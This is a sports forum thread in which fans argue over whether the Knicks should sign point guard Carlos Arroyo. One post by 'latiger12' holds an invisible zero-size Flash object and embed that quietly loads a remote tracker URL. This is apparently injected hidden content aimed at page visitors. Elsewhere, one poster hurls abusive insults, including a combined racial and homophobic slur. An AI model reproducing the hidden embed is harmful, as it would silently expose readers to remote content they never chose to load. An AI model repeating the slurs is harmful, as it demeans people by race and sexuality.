The Official Carlos Arroyo Thread

metrocard

Legend
Worst come to worst, we don't get Kidd, Nash, or Rubio...Arroyo would be the best option left.

World reknown for being the best Olympic PG in this decade, he has been a solid NBA PG who has threaten and caused panic(because he's Hispanic) to other PG's starting jobs such as Nelson and Billups...actually won the job in Orlando...and at the end you saw how Nelson ended the season for Orlando in the finals with his awful preformance.

Arroyo isn't Nash, but he can work the pick and roll with perfection and has an excellent midrange shot and is a very slick scorer.

Arroyo could be a short term guy till we draft a PG (Hopefully John Wall).
Not only because he's PR and MSG will be rocking with passionate PR fans (Finally all those YUPPIES could leave MSG and stop acting like its a church)

But because he's a GOOD PG.
Not great, but Arroyo is capable of being more productive and efficient than Duhon.

Check this out:

metrocard

Legend
Best Olympic PG this decade....right.......

I stopped reading after that.

Carlos was named the best pg in 04', 06', 07' FIBA tournaments (Basketball World Championship and Olympic games)

He won over Nash, Paul, Parker, Kidd, and PG's all around the world.

Thats 3 titles in 9 years...for a team that doesn't get to compete in the Olympics every-time often because of their depleted talent

IMO, Paul is the best Olympic PG right now...but Arroyo is PG of the decade, and if you can't see that, then you just straight up ignorant inside.

Knixy

Benchwarmer
If Carlos Arroyo was a blonde white guy, metroidiot wouldn't want him. You are such a closet racist, it's ridiculous.

ANU

Starter
i like this idea.you can't really knock him for his defense when we have dudu, we where gonna get a pass prime kidd, and want nash.

hoop115

Benchwarmer
Still not sure how we could possibly obtain a top 3 pick in next years draft to be able to draft John Wall.

Scribbles

Rotation player
Who cares about FIBA? :teeth:

Dude got cut from every team he ever played for in the NBA.

He's cool but honestly like you said, I don't see why we would need another mediocre PG at this point.

There's a difference between being a good basketball player and being successful in the NBA.

I knew a lot of kids that played like Arroyo back in the day - that doesn't necessarily translate to the NBA. It's rare and only a select few can really make that transition.....

Is he at least young? If he's over 28, I say pass....

latiger12

Rookie
Los is my dude, but he has zero interest in playing defense. He is a born ball player though, thats all he's ever known.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Yep and all the great one can play D. The kid as to learn those skills.

Supermansdaddy

Benchwarmer

He's cool but honestly like you said, I don't see why we would need another mediocre PG at this point.

There's a difference between being a good basketball player and being successful in the NBA.

I knew a lot of kids that played like Arroyo back in the day - that doesn't necessarily translate to the NBA. It's rare and only a select few can really make that transition.....

He didnt get cut, he fell out with Sloan, and signed new contracts with other teams.
He's highly skilled man, no doubt about it. I played 2 years with him at FIU, and i saw it every day, and some of the stuff he could do with the ball was crazy. I think the 2 things that hold him back, are his deficiencies in defense and that he's only an average athlete for the NBA. But in Mike D's system he could easily be a 14 and 8.5 player easily.

metrocard

Legend
He's better tham Duhon

Yeah...this is just a suggestion since Nash is going back to PHO, Kidd to DAL...Sessions doesn't looked lock with the Knicks.

Arroyo could be one of the best options out there, a good short term PG for us to use.

Los is my dude, but he has zero interest in playing defense. He is a born ball player though, thats all he's ever known.

Most of the NBA doesn't play defense, so no big deal.
Its kinda crazy to say Arroyo has zero interest in defense...at times he's solid and at he just gets beat on defense because he's bad at fighting screens.

This is a stupidasspost.
The World cares about FIBA, you cunt. Its the international league of the world. Thats like saying no one cares about FIFA...you really coming hard with the foolish remarks for no reason.
Getting cut and getting traded are two different things.
Isn't your punk ass an Artest fan? Artest has been traded more times than Arroyo, would it be smart to say Artest has been CUT from every team he was on? Just a DUMBASS thing to say, period. I'm an Artest fan + Arroyo fan...sometimes talented players get traded often, doesn't mean their bad(no Arroyo isn't on Artest level, just calm ya ass down and don't jump on it)
And why is Arroyo is cool? What was the logic in writing that?
Arroyo > Duhon, thats why we could use him.
You said:
"There's a difference between being a good basketball player and being successful in the NBA. "
How would you know? You were neither.
Are they really that different? Isn't making the NBA a success in itself?
Malditomariconassnigga...no one is saying is Arroyo is the most successful, but he is PROVEN at the NBA level, **** success.

But I shouldn't OD on you because you barely know a damn thing about Arroyo.

And a 30 year old veteran international PROVEN EXPERIENCE SKILLED bball star will always be a good option as PG.

Plus, we don't have a back up PG on this roster, so Arroyo wouldn't be a bad idea at all.

I'm in a BAD MOOD today...so excuse the violent text.

metrocard

Legend
He didnt get cut, he fell out with Sloan, and signed new contracts with other teams.
He's highly skilled man, no doubt about it. I played 2 years with him at FIU, and i saw it every day, and some of the stuff he could do with the ball was crazy. I think the 2 things that hold him back, are his deficiencies in defense and that he's only an average athlete for the NBA. But in Mike D's system he could easily be a 14 and 8.5 player easily.

This is pretty realistic.
Arroyo's biggest weaknesses are injuries, over-dribbling/thinking, fighting picks, finishing at the basket.
Arroyo's biggest strengths are pick/roll-to-jumper/pass, elite ball handling, craftiness, strength, experience, confidence, mid range jumper.

JayJ44

Starter
Honestly, any PG that isn't Duhon would be fine by me. Arroyo is talented, and could flourish in this system. Probably wouldn't cost much, so I say pick him up.

Crazy⑧s

Evacuee
The Official Who Gives A Shit About Arroyo Post.

Not hating on Arroyo, he's good. He balls madly in international because he's PR's best player and gets more of the action.

But, considering his flaws & his age, I can't see a decent reason to get another mediocre PG when there are so many young point men in the league atm.

It's not like we can't still make a run at Lawson.

He is better than Duhon, but honestly, how much better? Not a great deal.

tiger0330

Legend
Is he back on the market? Pointless to talk about him if he still has a FIBA contract and he is happy playing Euro ball. Not a bad player but he's always been a career backup like Duhon, getting a backup to replace a backup seems like standing still when you want to upgrade the PG position.

Scribbles

Rotation player
Arroyo is 30?!! PASS

Like dude above me said, replacing a back up with a back up isn't really an upgrade. Plus dude is pretty immature real Marbury-like. We need a leader PG that's a facilitator to this offense.

Then again, who knows....Ward & Childs worked for us - to an extent....

But for now, Arroyo has had 0 impact in the NBA. He's better off playing for Israel (I think that's where he plays now, correct?)

KingCharles34

All Star
I dont think it will happen just because donnie and dantoni aren't intelligent enough to make a good, low budget move like this. We wouldnt have to spend much to get Arroyo and he is undeniably better then duhomo. And i dont see how duhomo is any better on defense then Arroyo, he got burned by several point guards all last year.

portega1968

El Cacique
its a pity walsh and mr. pringles cant look beyond Arroyo's past woes and give him a shot

and Im not vouching for the guy cause he's a homey... fact is this guy would be perfect in the SSOL.. hes built for that type of offense